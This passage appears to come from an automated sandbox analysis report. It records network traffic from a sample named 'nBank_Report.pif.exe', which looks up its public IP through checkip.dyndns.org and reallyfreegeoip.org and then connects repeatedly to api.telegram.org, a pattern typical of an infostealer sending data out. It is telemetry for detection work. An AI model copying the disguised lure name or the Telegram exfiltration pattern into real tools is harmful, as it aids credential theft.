                                              Sep 26, 2024 11:37:08.287045002 CEST44349960149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:08.287251949 CEST49960443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:08.288585901 CEST49960443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:08.288592100 CEST44349960149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:08.289591074 CEST44349960149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:08.422091007 CEST49960443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:09.228122950 CEST49960443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:09.228279114 CEST44349960149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:09.228586912 CEST44349960149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:09.228787899 CEST49960443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:09.228787899 CEST49960443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:09.239577055 CEST49962443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:09.239624977 CEST44349962149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:09.239686966 CEST49962443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:09.239970922 CEST49962443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:09.239984035 CEST44349962149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:09.871722937 CEST44349962149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:09.875324011 CEST49962443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:09.875324011 CEST49962443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:09.875400066 CEST44349962149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:09.875808001 CEST44349962149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:09.921926022 CEST49962443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:10.771457911 CEST49962443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:10.771701097 CEST44349962149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:10.771898031 CEST49962443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:10.881622076 CEST49964443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:10.881748915 CEST44349964149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:10.881834984 CEST49964443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:10.882110119 CEST49964443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:10.882139921 CEST44349964149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:11.511666059 CEST44349964149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:11.511817932 CEST49964443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:11.513390064 CEST49964443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:11.513425112 CEST44349964149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:11.513896942 CEST44349964149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:11.621759892 CEST49964443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:12.592065096 CEST49964443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:12.592292070 CEST44349964149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:12.592377901 CEST49964443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:12.595268011 CEST49966443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:12.595303059 CEST44349966149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:12.595609903 CEST49966443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:12.691284895 CEST49966443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:12.692142010 CEST49967443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:12.692234993 CEST44349967149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:12.692352057 CEST49967443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:12.692893028 CEST49967443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:12.692941904 CEST44349967149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:13.360523939 CEST44349967149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:13.360790014 CEST49967443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:13.370058060 CEST49967443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:13.370089054 CEST44349967149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:13.370506048 CEST44349967149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:13.418736935 CEST49967443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:14.238307953 CEST49967443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:14.238450050 CEST44349967149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:14.238516092 CEST49967443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:14.241537094 CEST49969443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:14.241575003 CEST44349969149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:14.241731882 CEST49969443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:14.241960049 CEST49969443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:14.241972923 CEST44349969149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:14.870064974 CEST44349969149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:14.870178938 CEST49969443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:14.872172117 CEST49969443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:14.872201920 CEST44349969149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:14.872539997 CEST44349969149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:14.964467049 CEST49969443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:15.758502007 CEST49969443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:15.758658886 CEST44349969149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:15.758754969 CEST49969443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:15.868088007 CEST49971443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:15.868165970 CEST44349971149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:15.868767023 CEST49971443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:15.868767023 CEST49971443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:15.868860006 CEST44349971149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:17.464550018 CEST44349971149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:17.464641094 CEST49971443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:17.470598936 CEST49971443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:17.470633030 CEST44349971149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:17.470957041 CEST44349971149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:17.543648958 CEST49971443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:18.694405079 CEST49971443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:18.694526911 CEST44349971149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:18.694700003 CEST49971443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:18.820446014 CEST49973443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:18.820488930 CEST44349973149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:18.820822954 CEST49973443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:18.821455002 CEST49973443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:18.821468115 CEST44349973149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:19.428555012 CEST44349973149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:19.428644896 CEST49973443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:19.430546045 CEST49973443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:19.430556059 CEST44349973149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:19.430799961 CEST44349973149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:19.471091986 CEST49973443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:20.323266983 CEST49973443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:20.323398113 CEST44349973149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:20.323484898 CEST49973443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:20.328346968 CEST49975443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:20.328394890 CEST44349975149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:20.328464031 CEST49975443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:20.328785896 CEST49975443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:20.328797102 CEST44349975149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:21.292309999 CEST44349975149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:21.292615891 CEST49975443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:21.294630051 CEST49975443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:21.294644117 CEST44349975149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:21.295058012 CEST44349975149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:21.340611935 CEST49975443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:22.231657028 CEST49975443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:22.231777906 CEST44349975149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:22.231888056 CEST49975443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:22.336869001 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:22.336925030 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:22.337089062 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:22.337965012 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:22.337980032 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:22.959291935 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:22.959404945 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.424233913 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.424256086 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.424694061 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.434046030 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.434205055 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.434231997 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.434962034 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.434997082 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.435101032 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.435138941 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.435305119 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.435321093 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.435334921 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.435343981 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.435421944 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.435434103 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.435452938 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.435460091 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.435468912 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.435481071 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.435550928 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.435559034 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.435578108 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.435585022 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.435594082 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.435610056 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.435652971 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.435681105 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.435688972 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.435705900 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.435719967 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.435815096 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.435826063 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.435854912 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.435913086 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.435929060 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.435937881 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.435950041 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.436009884 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.436017036 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.436037064 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.436077118 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.436090946 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.436141968 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.444881916 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.445067883 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.445084095 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.445096016 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.445105076 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.445111990 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.445255995 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.445404053 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.445456028 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.445558071 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.445611954 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.445657969 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.445702076 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.445771933 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.449814081 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.449969053 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.449976921 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.450020075 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.450030088 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.450174093 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.450212002 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.450337887 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.450376034 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.450387001 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:25.450407982 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:25.450417995 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:27.061295033 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:27.061400890 CEST44349977149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:27.061739922 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:27.062061071 CEST49977443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:27.064332008 CEST49978443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:27.064366102 CEST44349978149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:27.064445019 CEST49978443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:27.064640045 CEST49978443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:27.064651012 CEST44349978149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:27.672840118 CEST44349978149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:27.715531111 CEST49978443192.168.2.10149.154.167.220

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 26, 2024 11:33:22.006232977 CEST5547853192.168.2.101.1.1.1
                                              Sep 26, 2024 11:33:22.014753103 CEST53554781.1.1.1192.168.2.10
                                              Sep 26, 2024 11:33:23.211779118 CEST5060553192.168.2.101.1.1.1
                                              Sep 26, 2024 11:33:23.219410896 CEST53506051.1.1.1192.168.2.10
                                              Sep 26, 2024 11:33:39.588824987 CEST6400553192.168.2.101.1.1.1
                                              Sep 26, 2024 11:33:39.596784115 CEST53640051.1.1.1192.168.2.10
                                              Sep 26, 2024 11:36:29.373768091 CEST5931953192.168.2.101.1.1.1
                                              Sep 26, 2024 11:36:29.380757093 CEST53593191.1.1.1192.168.2.10

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Sep 26, 2024 11:33:22.006232977 CEST192.168.2.101.1.1.10xae76Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 11:33:23.211779118 CEST192.168.2.101.1.1.10x6ce2Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 11:33:39.588824987 CEST192.168.2.101.1.1.10x1310Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                              Sep 26, 2024 11:36:29.373768091 CEST192.168.2.101.1.1.10x3b01Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Sep 26, 2024 11:33:22.014753103 CEST1.1.1.1192.168.2.100xae76No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 11:33:22.014753103 CEST1.1.1.1192.168.2.100xae76No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 11:33:22.014753103 CEST1.1.1.1192.168.2.100xae76No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 11:33:22.014753103 CEST1.1.1.1192.168.2.100xae76No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 11:33:22.014753103 CEST1.1.1.1192.168.2.100xae76No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 11:33:22.014753103 CEST1.1.1.1192.168.2.100xae76No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 11:33:23.219410896 CEST1.1.1.1192.168.2.100x6ce2No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 11:33:23.219410896 CEST1.1.1.1192.168.2.100x6ce2No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 11:33:33.848557949 CEST1.1.1.1192.168.2.100x3dabNo error (0)windowsupdatebg.s.llnwi.net87.248.204.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 11:33:39.596784115 CEST1.1.1.1192.168.2.100x1310No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                              Sep 26, 2024 11:36:25.781049967 CEST1.1.1.1192.168.2.100x1bd3No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                              Sep 26, 2024 11:36:25.781049967 CEST1.1.1.1192.168.2.100x1bd3No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                              Sep 26, 2024 11:36:29.380757093 CEST1.1.1.1192.168.2.100x3b01No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • reallyfreegeoip.org
                                              • api.telegram.org
                                              • checkip.dyndns.org

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.1049705132.226.247.73803276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 11:33:22.029629946 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 11:33:22.693856001 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 3e57bf2431ffbc098bb73ab6565c9768
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 11:33:22.770607948 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 11:33:22.978012085 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 8f8902725495cdcfb220f9b4e89d817b
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 11:33:23.916604042 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 11:33:24.121007919 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 9405468c123927216f4f19466b92e7d8
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.1049709132.226.247.73803276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 11:33:24.742583990 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 11:33:25.416522980 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:25 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: db29df3a5b737307f2b4e3f8436df988
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.1049711132.226.247.73803276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 11:33:26.038990021 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 11:33:26.711504936 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:26 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 0d5a45649d8e6e155e4b8431362c0beb
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.1049713132.226.247.73803276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 11:33:27.329714060 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 11:33:28.808664083 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:27 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: b0f21cc14fb0b7d37bb4117563eceadc
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 11:33:28.808722019 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:27 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: b0f21cc14fb0b7d37bb4117563eceadc
